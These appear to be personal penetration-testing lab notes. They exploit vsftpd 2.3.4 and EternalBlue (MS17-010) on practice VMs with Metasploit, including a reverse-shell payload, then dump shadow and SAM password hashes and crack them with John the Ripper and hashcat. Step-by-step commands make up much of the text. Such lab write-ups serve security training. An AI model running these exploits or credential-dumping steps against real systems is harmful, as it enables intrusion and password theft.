Exploiting linux-based systems:

  1. Fire up metasploitanle 2 linux
  2. Scan the target using nmap:
nmap -A -p 21 172.30.1.134

le_1

  • Nmap was able to identify the service version of the FTP service as vsFTPd 2.3.4
  1. Search in google vsftpd 2.3.4 exploit ![[Pasted image 20251020125219.png]]
  2. We are having an exploit module from rapid7 itself le_2
  3. Open up msfconsole
sudo msfconsole
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor 
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/ interact 
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 172.30.1.20 msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

le_3 6. Upgrading shell using command python -c 'import pty; pty.spawn("/bin/bash")' le_4 7. Got a root shell on the target system , dumped the /etc/shadow file where the hashes of the user’s passwords stored. le_5 8. Save the credentials into a text file, make sure edit the unecessary users from the output: le_6

Format of a shadow password file

Each line of the file contains nine fields that are separated by colons:

  • Username: User account and login name that exist in the system.
  • Encrypted password: Password using the format $type$salt$hashed and eight to 12 characters long. Last password change. Date since Jan. 1, 1970, when the password was last changed.
  • Minimum password age: The minimum number of days that must elapse before the password can be changed by the user.
  • Maximum password age. The number of days after which the password must be changed.
  • Warning period: The number of days before the password expires, during which time the user gets a warning to change the password.
  • Inactivity period: The number of days post-expiration – since Jan. 1, 1970 – before the user’s account is disabled.
  • Expiration date: The date on which the account was disabled. Unused. This field is left empty and reserved for future use.
  1. Next, we can use a popular password-cracking tool such as John the Ripper to perform offline password cracking to retrieve the plaintext password:
john /home/kali/msf2_linux_user_hashes.txt --wordlist=/usr/ share/wordlists/rockyou.txt

le_7


Exploiting windows based system:

  1. I am going to use a vulnerable vm named Blue which is having the vulnerability Eternal Blue aka MS17-010
  2. Identifying it’s IP: le_8
  3. Target machine: le_9
  4. Scanning the target using nmap
nmap -A -p 136-139,445 192.168.83.136
  • I am going to focus on port 136,139,445 , because the vulnerability is in SMB le_10
  • 139,445 -> SMB ports are open. le_11
  1. We will try to identify the version of smb using metasploit
sudo msfconsole
use smb_version

le_12 le_13 6. Let’s check if the machine is vulnerable to ms17-010 le_14 le_15 It didn’t pick up the vulnerability, but the exploit did: 7. Now let’s use the exploit module:

msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/ meterpreter/reverse_tcp 
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.83.136 
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.83.128
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

le_16le_17 le_18 8. Run some commands to check our privileges: le_19 9. Next, use the hashdump command within Meterpreter to extract the contents of the Security Account Manager (SAM) file: le_20

  • The SAM file is found within Microsoft Windows operating systems in the %SystemRoot%/ system32/config/SAM directory and contains a record of all local user accounts, their Security Identifier (SID) values, and password hashes.
  1. you can identify the usernames as they are plaintext, the LAN Manager (LM), and New Technology LAN Manager (NTLM) password hashes for each local user account. The SAM file stores each user’s credentials in the following format:
Username : Security Identifier (SID) : LM hash : NTLM hash
  1. Save the hashdump output into a txt file.
  2. Additionally, save the user Administrator with its LM and NTLM hashes into another text file, name it Blue_admin_user.txt, and use the following format:
Administrator:aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5
  1. Identifying the hash value type, starting with 58f5 of the admin hash is the hash value :
hashid 58f5081696f366cdc72491a2c4996bd5

le_21

Important

Keep in mind that Microsoft Windows operating systems do not store local users’ passwords in plaintext. Instead, they parse the plaintext password through a hashing algorithm such as NTLM, which performs a one-way function of converting the plaintext password into a cryptographic NTLM digest (hash). This process is non-reversible. The NTLM hash of each local user account is stored within the SAM file


Cracking hashes with hashcat:

  1. Identifying hash type of NTLM le_22
  2. Command for cracking:
hashcat -m 1000 /home/kali/Blue_pass_hashes.txt -a 0 /usr/share/wordlists/rockyou.txt 
# we can give one hash also
hashcat -m 1000 "hash_value" /usr/share/wordlist/rockyou.txt

le_23


setting up hashcat on host machine:

Step 1: Install Dependencies

Before you download Hashcat, you need to install two key dependencies:

  1. GPU Drivers: Hashcat uses your graphics card (GPU) for password cracking. You must install the latest drivers for your specific card.
    • For NVIDIA GPUs: Download and install the latest CUDA Toolkit from the NVIDIA Developer website.
    • For AMD/Intel GPUs: Download and install the latest Adrenalin Edition drivers from the AMD Support website. Using the “Auto-Detect and Install” tool is often the easiest option.
  2. Visual C++ Redistributable: Hashcat requires the Microsoft Visual C++ runtime libraries.
    • Download and install the latest “Visual Studio 2015, 2017, 2019, and 2022” package from the official Microsoft website. Be sure to get the X64 version.
    • Also install one library inside visual studio installer which is "Desktop development with C++"
  3. Install Your respective NVIDIA GPU DRIVER from NVIDIA-DRIVERS , select your GPU model and install it.

After installing these, it’s a good idea to restart your computer.

Step 2: Download and Extract Hashcat

  1. Go to the official Hashcat website.
  2. Download the binary version (it will be a .7z file).
  3. You will need a file archiver like 7-Zip (which is free) to extract the .7z file.
  4. Create a new folder in a simple location (like C:\hashcat).
  5. Extract the contents of the downloaded .7z file into your new C:\hashcat folder.

Step 3: Run Hashcat

  1. Open the Start Menu, type cmd, and select Run as administrator.
  2. change directory to :
cd hashcat/hashcat-7.1.2

le_24 3. To verify the installation and see all your connected devices (CPUs/GPUs), run a benchmark test:

hashcat.exe -b

You should see results like these: le_25 4. After this run on your wordlists and hashes to crack:

C:\hashcat\hashcat-7.1.2>hashcat.exe -m 1000 "C:\Blue_pass_hashes.txt" C:\rockyou.txt

le_26 5. checking on single hash:

hashcat -m 1000 "7A21990FCD3D759941E45C490F143D5F" rockyou.txt

le_27